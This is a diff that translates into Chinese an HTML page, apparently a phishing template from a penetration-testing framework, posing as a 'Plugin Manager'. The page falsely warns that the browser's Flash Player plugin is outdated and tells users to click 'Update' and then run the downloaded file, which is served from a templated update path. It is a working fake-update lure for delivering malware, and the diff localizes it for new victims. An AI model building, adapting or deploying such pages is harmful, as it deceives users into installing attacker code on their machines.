@@ -3,7 +3,7 @@
    
    <head>
       <link rel="icon" href="images/favicon.ico">  
-      <title>Plugin Manager</title>
+      <title>插件管理中心</title>
       <meta name = "viewport" content = "width = device-width, initial-scale = 1.0">
       
       <link href = "css/bootstrap.min.css" rel = "stylesheet">
@@ -16,7 +16,7 @@
     <nav class="navbar navbar-inverse navbar-fixed-top">
       <div class="container">
         <div class="navbar-header">
-          <a class="navbar-brand" href="">Plugin Manager</a>
+          <a class="navbar-brand" href="">插件管理</a>
         </div>
         </div>
         </nav>
@@ -25,16 +25,16 @@
       <div class="container theme-showcase" role="main">
 
       <div class="alert alert-warning" role="alert">
-        <h4><strong>WARNING:</strong> Your browser plugins are severely out of date. Update your browser plugins to continue browsing securely.</h4>
+        <h4><strong>警告:</strong> 您的浏览器插件已过时，升级您的浏览器插件以保证浏览安全！</h4>
       </div>
 
       <div class="page-header">
-        <h1><strong>Update Your Plugins</strong></h1>
-        <h4>Keeping your plugins up to date helps your browser run safely and smoothly.</h4>
+        <h1><strong>升级您的插件</strong></h1>
+        <!--<h4>升级插件以保持浏览器安全.</h4>-->
       </div>
 
       <div class="jumbotron">
-        <h1>Plugin Status</h1>
+        <h1>插件状态</h1>
        <br>
 
       <div class="row">
@@ -42,9 +42,9 @@
           <table class="table">
             <thead>
               <tr>
-                <th><h3>Plugin</h3></th>
-                <th><h3>Status</h3></th>
-                <th><h3>Action</h3></th>
+                <th><h3>插件</h3></th>
+                <th><h3>状态</h3></th>
+                <th><h3>操作</h3></th>
 
               </tr>
             </thead>
@@ -52,17 +52,17 @@
               <tr>
                 <td>
                   <strong>Flash Player</strong><br>
-                  Flash Player is a lightweight browser plug-in and rich Internet application runtime that delivers consistent and engaging user experiences, stunning audio/video playback, and exciting gameplay
+                  Flash Player 是一个轻量级浏览器插件
                </td>
 
                 <td>
-                  <br><strong>Outdated</strong>
+                  <br><strong>已过时</strong>
                </td>
 
                 <td>
                   <h4>
                   <form method="get" action="{{ update_path }}">
-                    <button type="submit" class="btn btn-lg btn-success">Update Now</button>
+                    <button type="submit" class="btn btn-lg btn-success">升级</button>
                     </form>
                   </h4>
                 </td>
@@ -75,8 +75,8 @@
                <p> 
        <ul class="list-unstyled">
                <ul>
-                   <li><h4><strong>Step 1:</strong> Click 'Update Now' to download the update file.</h4></li>
-                   <li><h4><strong>Step 2:</strong> Run the update file to update your plugins.</h4></li>
+                   <li><h4><strong>步骤 1:</strong> 点击 '升级' 下载升级文件.</h4></li>
+                   <li><h4><strong>步骤 2:</strong> 安装升级文件来进行更新.</h4></li>
                </ul>
        </ul>
       <br>
@@ -86,40 +86,40 @@
       </div>
       </div>
 
-      <div class="jumbotron">
-        <h1>Frequently Asked Questions</h1>
+      <!--<div class="jumbotron">-->
+        <!--<h1>Frequently Asked Questions</h1>-->
 
-      <div class="row marketing">
-        <div class="col-lg-6">
-          <h3>What is a plugin?</h3>
-      <p> 
-       <ul class="list-unstyled">
-               <ul>
-                   <li><h4>Plugins power videos, animation and games.</h4></li>
-                   <li><h4>Plugins don't always update automatically.</h4></li>
-                   <li><h4>They're built outside of your browser by companies like Adobe Systems and Apple.</h4></li>
-               </ul>
-       </ul>
-       <br>
-      <p>
+      <!--<div class="row marketing">-->
+        <!--<div class="col-lg-6">-->
+          <!--<h3>What is a plugin?</h3>-->
+      <!--<p> -->
+       <!--<ul class="list-unstyled">-->
+               <!--<ul>-->
+                   <!--<li><h4>Plugins power videos, animation and games.</h4></li>-->
+                   <!--<li><h4>Plugins don't always update automatically.</h4></li>-->
+                   <!--<li><h4>They're built outside of your browser by companies like Adobe Systems and Apple.</h4></li>-->
+               <!--</ul>-->
+       <!--</ul>-->
+       <!--<br>-->
+      <!--<p>-->
 
-          <h3>How does Plugin Manager help me?</h3>
-          <h4>Your browser's plugin manager <strong>automatically updates</strong> most of your plugins for you. However, some plugins occassionally require <strong>manual updating</strong>.</h4>
-       <br>
+          <!--<h3>How does Plugin Manager help me?</h3>-->
+          <!--<h4>Your browser's plugin manager <strong>automatically updates</strong> most of your plugins for you. However, some plugins occassionally require <strong>manual updating</strong>.</h4>-->
+       <!--<br>-->
 
-        </div>
+        <!--</div>-->
 
-        <div class="col-lg-6">
-          <h3>Why should I update my plugins?</h3>
-         <p> 
-          <ul class="list-unstyled">
-                  <ul>
-                      <li><h4>Old plugins <strong>increase your risk</strong> for attack by malware, viruses, and other security threats.</h4></li>
-                      <li><h4><strong>Updated plugins have improvements</strong> that make the web <strong>better and safer</strong> for you.</h4></li>
-                      <li><h4>Old plugins can <strong>interrupt browsing</strong> and waste your time.</h4></li>
+        <!--<div class="col-lg-6">-->
+          <!--<h3>Why should I update my plugins?</h3>-->
+         <!--<p> -->
+          <!--<ul class="list-unstyled">-->
+                  <!--<ul>-->
+                      <!--<li><h4>Old plugins <strong>increase your risk</strong> for attack by malware, viruses, and other security threats.</h4></li>-->
+                      <!--<li><h4><strong>Updated plugins have improvements</strong> that make the web <strong>better and safer</strong> for you.</h4></li>-->
+                      <!--<li><h4>Old plugins can <strong>interrupt browsing</strong> and waste your time.</h4></li>-->
 
-                  </ul>
-          </ul>
+                  <!--</ul>-->
+          <!--</ul>-->
           <br>
 
          <img src="images/plugins.png" class="img-thumbnail" alt="A generic square placeholder image with a white border around it, making it resemble a photograph taken with an old instant camera">
